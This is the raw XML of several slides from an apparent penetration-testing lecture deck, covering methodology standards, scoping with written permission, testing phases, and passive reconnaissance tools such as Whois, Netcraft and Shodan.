          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803473" y="4462569"/>
            <a:ext cx="5185328" cy="2220170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0042E7-C66E-4E11-96C8-B06B3532C97C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3649211" y="4462569"/>
            <a:ext cx="4748169" cy="2220170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA146BA-A82C-4C45-BDFB-983B25060057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7296343" y="2046413"/>
            <a:ext cx="3085714" cy="1161905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C46D3D-8A1D-40B1-ADB9-3CD956826C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5192551"/>
            <a:ext cx="2914405" cy="1040859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2582FBB6-D4C6-4851-B29C-2D4F7DC915B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839200" y="3075561"/>
            <a:ext cx="2914405" cy="878207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1963985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7B21B-69C4-49B9-8770-C905EE0630EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Testing Methodologies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{094F4EC1-78A4-4A7C-B78C-19FF65A82FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600201"/>
            <a:ext cx="11379200" cy="5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP testing guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>PCI Penetration testing guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Penetration Testing Execution Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>NIST 800-115</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Penetration Testing Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Information Systems Security Assessment Framework (ISSAF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Open Source Security Testing Methodology Manual (“OSSTMM”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>FedRAMP Penetration Test Guidance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>CREST Penetration Testing Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Web App Hacker Handbook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>the-web-application-hackers-handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234046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 - SANS</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2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AEA66B5-1331-4A01-B416-F1E7EE28C126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2049787"/>
            <a:ext cx="10439465" cy="4341181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{252ADBD9-A996-464E-A97B-CDD93F669EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2049786"/>
            <a:ext cx="10439465" cy="4341181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3618759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 - NIST 800-115</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2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBB6F82-810C-4BEA-AED0-D3849BF36663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="328112" y="1799303"/>
            <a:ext cx="8354587" cy="4375355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B4AFC5-662C-4382-92CB-E2C2421BD692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8976853" y="2122523"/>
            <a:ext cx="2939844" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Methodology should be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Proven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Repeatable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Explainable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC07BC11-A708-4ACD-A2DC-4142E86DBED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="328112" y="1807906"/>
            <a:ext cx="8354587" cy="4375355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2109646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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scoping – Recapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Written permission from all parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type of test </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPs, URLs, keys, and token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… for access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="444188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marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time to start testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon (Passive and Active)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mapping -  Manual and Automated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2101987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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery – continued</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denial-of-service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business Logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3701127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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon (Passive and Active)  ** MOST IMPORTANT**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools – Passive </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcraft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Robtex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or Dig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon-NG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WayBackMachine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Exif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Strings, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Megagoofil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864AB25A-5FDB-4372-BD20-6E77433BBFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6436732" y="3072254"/>
            <a:ext cx="5941741" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- Google Hacking DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- Shodan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- Job Boards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1845326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a:xfrm>
            <a:off x="5053781" y="76200"/>
            <a:ext cx="6935019" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Robtex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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530942" y="1726141"/>
            <a:ext cx="10972800" cy="4790767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Netcraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Robtex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5AFDBA-1559-4B14-9BAD-55D4E88834E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
